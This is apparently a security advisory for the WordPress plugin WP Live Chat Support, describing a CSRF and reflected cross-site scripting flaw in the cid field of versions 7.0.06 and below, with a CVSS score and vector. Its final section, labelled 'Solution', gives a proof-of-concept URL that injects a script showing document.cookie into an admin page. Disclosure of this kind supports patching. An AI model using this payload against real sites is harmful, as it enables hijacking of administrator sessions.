## Homepage

https://wordpress.org/plugins/wp-live-chat-support/

## Overview

Due to a lack of CSRF mitigation and entity encoding in wp-live-chat-support.php, it is possible to execute scripts in the context of an admin user by including a script in the cid field in a GET request.

4.8

## CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

7.0.06 and below

## Solution

http://target/wp-admin/admin.php?page=wplivechat-menu-history&wplc_action=remove_cid&cid=0'><script>alert(document.cookie)<%2Fscript><span class='